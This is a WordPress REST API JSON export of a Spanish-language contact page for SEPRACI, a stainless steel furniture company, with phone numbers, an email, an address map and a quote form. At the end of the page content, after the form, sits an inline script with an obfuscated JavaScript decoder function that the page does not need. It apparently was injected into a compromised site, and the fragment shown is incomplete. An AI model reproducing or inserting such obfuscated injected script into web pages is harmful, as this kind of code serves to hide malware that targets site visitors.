{"id":59,"date":"2015-12-09T21:33:14","date_gmt":"2015-12-09T21:33:14","guid":{"rendered":"http:\/\/www.hhmaster.com\/RumboProm\/?page_id=59"},"modified":"2016-12-14T16:28:44","modified_gmt":"2016-12-14T16:28:44","slug":"contacto","status":"publish","type":"page","link":"https:\/\/sepraci.com\/m\/contacto\/","title":{"rendered":"Contacto"},"content":{"rendered":"<div id='full_slider_1'  class='avia-fullwidth-slider main_color avia-shadow   avia-builder-el-0  el_before_av_section  avia-builder-el-first   container_wrap sidebar_right'  ><div  class='avia-slideshow av-av_slideshow_full-7c89eef234b705e7a4d2de62d66c7ebb avia-slideshow-no scaling av_slideshow_full avia-slide-slider av-slideshow-ui av-control-default av-slideshow-manual av-loop-once av-loop-manual-endless av-default-height-applied   avia-slideshow-1' data-slideshow-options=\"{&quot;animation&quot;:&quot;slide&quot;,&quot;autoplay&quot;:false,&quot;loop_autoplay&quot;:&quot;once&quot;,&quot;interval&quot;:5,&quot;loop_manual&quot;:&quot;manual-endless&quot;,&quot;autoplay_stopper&quot;:false,&quot;noNavigation&quot;:false,&quot;bg_slider&quot;:false,&quot;keep_padding&quot;:false,&quot;hoverpause&quot;:false,&quot;show_slide_delay&quot;:0}\"  itemprop=\"image\" itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/ImageObject\" ><ul class='avia-slideshow-inner ' style='padding-bottom: 22.239583333333%;'><li  class='avia-slideshow-slide av-av_slideshow_full-7c89eef234b705e7a4d2de62d66c7ebb__0  av-single-slide slide-1 slide-odd'><div data-rel='slideshow-1' class='avia-slide-wrap '   ><img class=\"wp-image-1290 avia-img-lazy-loading-not-1290\"  src='https:\/\/sepraci.com\/m\/wp-content\/uploads\/2016\/12\/h8.jpg' width='1920' height='427' title='h8' alt=''  itemprop=\"thumbnailUrl\"   \/><\/div><\/li><\/ul><\/div><\/div>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_section-1b0c0ccb1d9c1c310be46b115fb264f9\">\n.avia-section.av-av_section-1b0c0ccb1d9c1c310be46b115fb264f9{\nbackground-repeat:no-repeat;\nbackground-image:url(https:\/\/sepraci.com\/m\/wp-content\/uploads\/2016\/12\/bg.jpg);\nbackground-position:50% 0%;\nbackground-attachment:scroll;\n}\n<\/style>\n<div id='av_section_1'  class='avia-section av-av_section-1b0c0ccb1d9c1c310be46b115fb264f9 main_color avia-section-default avia-no-shadow  avia-builder-el-1  el_after_av_slideshow_full  avia-builder-el-last  avia-bg-style-scroll container_wrap sidebar_right'  data-section-bg-repeat='no-repeat'><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-59'><div class='entry-content-wrapper clearfix'>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_one_third-9497bbf8bff73ea4c6992cc17fa9ec36\">\n.flex_column.av-av_one_third-9497bbf8bff73ea4c6992cc17fa9ec36{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-av_one_third-9497bbf8bff73ea4c6992cc17fa9ec36 av_one_third  avia-builder-el-2  el_before_av_one_third  avia-builder-el-first  first flex_column_div av-zero-column-padding  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16\">\n#top .avia-icon-list-container.av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16 .iconlist_icon{\ncolor:#ffffff;\nbackground-color:#4f638e;\nborder:1px solid #4f638e;\n}\n#top #wrap_all .avia-icon-list-container.av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16 .av_iconlist_title{\ncolor:#020202;\n}\n<\/style>\n<div  class='avia-icon-list-container av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16  avia-builder-el-3  el_before_av_iconlist  avia-builder-el-first '><ul class='avia-icon-list avia_animate_when_almost_visible avia-icon-list-left av-iconlist-big av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16 avia-iconlist-animate'>\n<li><div class='iconlist_icon av-av_iconlist_item-afef023ab2ff87fa4465971e11bca641 avia-font-entypo-fontello'><span class='iconlist-char' aria-hidden='true' data-av_icon='\ue854' data-av_iconfont='entypo-fontello'><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\"><h4 class='av_iconlist_title iconlist_title  av_inherit_color'  itemprop=\"headline\" >Tel\u00e9fonos<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p><span style=\"font-family: arial,helvetica,sans-serif; font-size: 18pt;\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><\/p>\n<ul>\n<li><span style=\"font-family: arial,helvetica,sans-serif; font-size: 14pt; color: #000000;\">5373-6212<\/span><\/li>\n<li><span style=\"font-family: arial,helvetica,sans-serif; font-size: 14pt; color: #000000;\">7158-46<\/span><span style=\"font-family: arial,helvetica,sans-serif; font-size: 14pt; color: #000000;\">61<\/span><\/li>\n<li><span style=\"font-family: arial,helvetica,sans-serif; font-size: 14pt; color: #000000;\">Cel. 55-3717-6973<\/span><\/li>\n<\/ul>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<\/ul><\/div><br \/>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16\">\n#top .avia-icon-list-container.av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16 .iconlist_icon{\ncolor:#ffffff;\nbackground-color:#4f638e;\nborder:1px solid #4f638e;\n}\n#top #wrap_all .avia-icon-list-container.av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16 .av_iconlist_title{\ncolor:#020202;\n}\n<\/style>\n<div  class='avia-icon-list-container av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16  avia-builder-el-4  el_after_av_iconlist  el_before_av_iconlist '><ul class='avia-icon-list avia_animate_when_almost_visible avia-icon-list-left av-iconlist-big av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16 avia-iconlist-animate'>\n<li><div class='iconlist_icon av-av_iconlist_item-0c1c8e170bbe7de7560abfdce9e1c972 avia-font-entypo-fontello'><span class='iconlist-char' aria-hidden='true' data-av_icon='\ue805' data-av_iconfont='entypo-fontello'><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\"><h4 class='av_iconlist_title iconlist_title  av_inherit_color'  itemprop=\"headline\" >Correo Electr\u00f3nico<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p><span style=\"font-family: arial,helvetica,sans-serif; font-size: 18pt;\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><\/p>\n<p><strong style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt; color: #000000;\"><span style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt; color: #000000;\">Ventas:<\/span><\/strong><\/p>\n<p><span style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt; color: #000000;\"><a style=\"color: #000000;\" href=\"mailto:cocinas@sepraci.com\">cocinas@sepraci.com<\/a><\/span><\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<\/ul><\/div><br \/>\n\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16\">\n#top .avia-icon-list-container.av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16 .iconlist_icon{\ncolor:#ffffff;\nbackground-color:#4f638e;\nborder:1px solid #4f638e;\n}\n#top #wrap_all .avia-icon-list-container.av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16 .av_iconlist_title{\ncolor:#020202;\n}\n<\/style>\n<div  class='avia-icon-list-container av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16  avia-builder-el-5  el_after_av_iconlist  avia-builder-el-last '><ul class='avia-icon-list avia_animate_when_almost_visible avia-icon-list-left av-iconlist-big av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16 avia-iconlist-animate'>\n<li><div class='iconlist_icon av-av_iconlist_item-8f9ea53edb07199763e6c0a4a2105534 avia-font-entypo-fontello'><span class='iconlist-char' aria-hidden='true' data-av_icon='\ue842' data-av_iconfont='entypo-fontello'><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\"><h4 class='av_iconlist_title iconlist_title  av_inherit_color'  itemprop=\"headline\" >Direcci\u00f3n<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p><span style=\"font-size: 12pt; font-family: arial,helvetica,sans-serif; color: #000000;\"><span style=\"font-family: arial,helvetica,sans-serif; font-size: 18pt;\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><\/span><\/p>\n<p><span style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt; color: #000000;\">Av. Mexicas No. 50 Col. Santa Cruz Acatl\u00e1n, Naucalpan Edo. de M\u00e9xico (frente a oficinas de Tr\u00e1nsito de Naucalpan).<br \/>\n<\/span><\/p>\n<p><span style=\"font-family: arial,helvetica,sans-serif; font-size: 14pt;\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/span><\/p>\n<p><iframe loading=\"lazy\" style=\"border: 0;\" src=\"https:\/\/www.google.com\/maps\/embed?pb=!1m18!1m12!1m3!1d4472.928814946189!2d-99.24440094660697!3d19.487024539172257!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x85d20304e1ee0d4b%3A0x79087cdda0e2ac5a!2sSepraci!5e0!3m2!1ses-419!2smx!4v1481221027223\" width=\"320\" height=\"200\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p><span style=\"font-size: 12pt; color: #000000;\">\u00a0<\/span><\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<\/ul><\/div><\/p><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_one_third-9c1d454dc06f7247226bc4e8f931daae\">\n.flex_column.av-av_one_third-9c1d454dc06f7247226bc4e8f931daae{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-av_one_third-9c1d454dc06f7247226bc4e8f931daae av_one_third  avia-builder-el-6  el_after_av_one_third  el_before_av_one_third  flex_column_div av-zero-column-padding  '     ><style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16\">\n#top .avia-icon-list-container.av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16 .iconlist_icon{\ncolor:#ffffff;\nbackground-color:#4f638e;\nborder:1px solid #4f638e;\n}\n#top #wrap_all .avia-icon-list-container.av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16 .av_iconlist_title{\ncolor:#020202;\n}\n<\/style>\n<div  class='avia-icon-list-container av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16  avia-builder-el-7  avia-builder-el-no-sibling '><ul class='avia-icon-list avia_animate_when_almost_visible avia-icon-list-left av-iconlist-big av-av_iconlist-e6a5ec44ffba33f1559b1ac5bed46c16 avia-iconlist-animate'>\n<li><div class='iconlist_icon av-av_iconlist_item-bc47c4caee6f4f13a6806752d932248c avia-font-entypo-fontello'><span class='iconlist-char' aria-hidden='true' data-av_icon='\ue8b7' data-av_iconfont='entypo-fontello'><\/span><\/div><article class=\"article-icon-entry \"  itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class=\"iconlist_content_wrap\"><header class=\"entry-content-header\"><h4 class='av_iconlist_title iconlist_title  av_inherit_color'  itemprop=\"headline\" >COMENTARIOS<\/h4><\/header><div class='iconlist_content '  itemprop=\"text\" ><p><span style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt; color: #000000;\">Agradecemos su inter\u00e9s en nuestros productos y servicios.<\/span><\/p>\n<p><span style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt; color: #000000;\">Si desea una cotizacion o mayores informes <\/span><span style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt; color: #000000;\">por favor llene el siguiente formulario.<\/span><\/p>\n<p><span style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt; color: #000000;\">Los datos marcados con asterisco <span style=\"color: #ff0000;\">*<\/span> son indispensables <\/span><span style=\"font-family: arial,helvetica,sans-serif; font-size: 12pt; color: #000000;\">para responder su mensaje.<\/span><\/p>\n<\/div><\/div><footer class=\"entry-footer\"><\/footer><\/article><div class=\"iconlist-timeline\"><\/div><\/li>\n<\/ul><\/div><\/div>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_one_third-9c1d454dc06f7247226bc4e8f931daae\">\n.flex_column.av-av_one_third-9c1d454dc06f7247226bc4e8f931daae{\nborder-radius:0px 0px 0px 0px;\npadding:0px 0px 0px 0px;\n}\n<\/style>\n<div  class='flex_column av-av_one_third-9c1d454dc06f7247226bc4e8f931daae av_one_third  avia-builder-el-8  el_after_av_one_third  avia-builder-el-last  flex_column_div av-zero-column-padding  '     ><form action=\"https:\/\/sepraci.com\/m\/contacto\/\" method=\"post\" data-fields-with-error=\"Found errors in the following field(s):\" class=\"avia_ajax_form av-form-labels-visible   avia-builder-el-9  avia-builder-el-no-sibling   \" data-avia-form-id=\"1\" data-avia-redirect='' ><fieldset><p class='  first_form  form_element form_fullwidth' id='element_avia_1_1'><label for=\"avia_1_1\">Nombre <abbr class=\"required\" title=\"requerido\">*<\/abbr><\/label> <input name=\"avia_1_1\" class=\"text_input is_empty\" type=\"text\" id=\"avia_1_1\" value=\"\" \/><\/p><p class='  first_form  form_element form_fullwidth' id='element_avia_2_1'><label for=\"avia_2_1\">Empresa<\/label> <input name=\"avia_2_1\" class=\"text_input \" type=\"text\" id=\"avia_2_1\" value=\"\" \/><\/p><p class='  first_form  form_element form_fullwidth' id='element_avia_3_1'><label for=\"avia_3_1\">Clave LADA <abbr class=\"required\" title=\"requerido\">*<\/abbr><\/label> <input name=\"avia_3_1\" class=\"text_input is_number\" type=\"text\" id=\"avia_3_1\" value=\"\" \/><\/p><p class='  first_form  form_element form_fullwidth' id='element_avia_4_1'><label for=\"avia_4_1\">Tel\u00e9fono <abbr class=\"required\" title=\"requerido\">*<\/abbr><\/label> <input name=\"avia_4_1\" class=\"text_input is_phone\" type=\"text\" id=\"avia_4_1\" value=\"\" \/><\/p><p class='  first_form  form_element form_fullwidth' id='element_avia_5_1'><label for=\"avia_5_1\">E-Mail <abbr class=\"required\" title=\"requerido\">*<\/abbr><\/label> <input name=\"avia_5_1\" class=\"text_input is_email\" type=\"text\" id=\"avia_5_1\" value=\"\" \/><\/p><p class='  first_form  form_element form_fullwidth' id='element_avia_6_1'><label for=\"avia_6_1\">Estado<\/label> <input name=\"avia_6_1\" class=\"text_input \" type=\"text\" id=\"avia_6_1\" value=\"\" \/><\/p><p class='  first_form  form_element form_fullwidth' id='element_avia_7_1'><label for=\"avia_7_1\">Pa\u00eds<\/label> <input name=\"avia_7_1\" class=\"text_input \" type=\"text\" id=\"avia_7_1\" value=\"\" \/><\/p><p class='  first_form  form_element form_fullwidth' id='element_avia_8_1'><label for=\"avia_8_1\">Producto de su interes <abbr class=\"required\" title=\"requerido\">*<\/abbr><\/label> <input name=\"avia_8_1\" class=\"text_input is_empty\" type=\"text\" id=\"avia_8_1\" value=\"\" \/><\/p><p class='  first_form  form_element form_fullwidth av-last-visible-form-element' id='element_avia_9_1'><label for=\"avia_9_1\" class=\"textare_label hidden textare_label_avia_9_1\">Comentarios<\/label><textarea  name=\"avia_9_1\" class=\"text_area \" cols=\"40\" rows=\"7\" id=\"avia_9_1\" ><\/textarea><\/p><p class=\"hidden\"><input type=\"text\" name=\"avia_10_1\" class=\"hidden \" id=\"avia_10_1\" value=\"\" \/><\/p><p class=\"form_element \"><input type=\"hidden\" value=\"1\" name=\"avia_generated_form1\" \/><input type=\"submit\" value=\"Enviar\" class=\"button\"  data-sending-label=\"Enviando\"\/><\/p><\/fieldset><\/form><div id=\"ajaxresponse_1\" class=\"ajaxresponse ajaxresponse_1 hidden\"><\/div><\/div><\/div><\/div><\/div><!-- close content main div --><\/div><\/div><div id='after_section_1'  class='main_color av_default_container_wrap container_wrap sidebar_right'  ><div class='container av-section-cont-open' ><div class='template-page content  av-content-small alpha units'><div class='post-entry post-entry-type-page post-entry-59'><div class='entry-content-wrapper clearfix'><br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":8,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Contacto<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/sepraci.com\/m\/contacto\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Contacto\" \/>\n<meta property=\"og:url\" content=\"https:\/\/sepraci.com\/m\/contacto\/\" \/>\n<meta property=\"og:site_name\" content=\"SEPRACI\" \/>\n<meta property=\"article:modified_time\" content=\"2016-12-14T16:28:44+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/sepraci.com\/m\/contacto\/\",\"url\":\"https:\/\/sepraci.com\/m\/contacto\/\",\"name\":\"Contacto\",\"isPartOf\":{\"@id\":\"https:\/\/sepraci.com\/m\/#website\"},\"datePublished\":\"2015-12-09T21:33:14+00:00\",\"dateModified\":\"2016-12-14T16:28:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/sepraci.com\/m\/contacto\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/sepraci.com\/m\/contacto\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/sepraci.com\/m\/contacto\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/sepraci.com\/m\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Contacto\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/sepraci.com\/m\/#website\",\"url\":\"https:\/\/sepraci.com\/m\/\",\"name\":\"SEPRACI\",\"description\":\"Muebles de Acero Inoxidable\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/sepraci.com\/m\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"es\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Contacto","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/sepraci.com\/m\/contacto\/","og_locale":"es_ES","og_type":"article","og_title":"Contacto","og_url":"https:\/\/sepraci.com\/m\/contacto\/","og_site_name":"SEPRACI","article_modified_time":"2016-12-14T16:28:44+00:00","twitter_card":"summary_large_image","twitter_misc":{"Tiempo de lectura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/sepraci.com\/m\/contacto\/","url":"https:\/\/sepraci.com\/m\/contacto\/","name":"Contacto","isPartOf":{"@id":"https:\/\/sepraci.com\/m\/#website"},"datePublished":"2015-12-09T21:33:14+00:00","dateModified":"2016-12-14T16:28:44+00:00","breadcrumb":{"@id":"https:\/\/sepraci.com\/m\/contacto\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/sepraci.com\/m\/contacto\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/sepraci.com\/m\/contacto\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/sepraci.com\/m\/"},{"@type":"ListItem","position":2,"name":"Contacto"}]},{"@type":"WebSite","@id":"https:\/\/sepraci.com\/m\/#website","url":"https:\/\/sepraci.com\/m\/","name":"SEPRACI","description":"Muebles de Acero Inoxidable","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/sepraci.com\/m\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"es"}]}},"_links":{"self":[{"href":"https:\/\/sepraci.com\/m\/wp-json\/wp\/v2\/pages\/59"}],"collection":[{"href":"https:\/\/sepraci.com\/m\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/sepraci.com\/m\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/sepraci.com\/m\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sepraci.com\/m\/wp-json\/wp\/v2\/comments?post=59"}],"version-history":[{"count":45,"href":"https:\/\/sepraci.com\/m\/wp-json\/wp\/v2\/pages\/59\/revisions"}],"predecessor-version":[{"id":162,"href":"https:\/\/sepraci.com\/m\/wp-json\/wp\/v2\/pages\/59\/revisions\/162"}],"wp:attachment":[{"href":"https:\/\/sepraci.com\/m\/wp-json\/wp\/v2\/media?parent=59"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}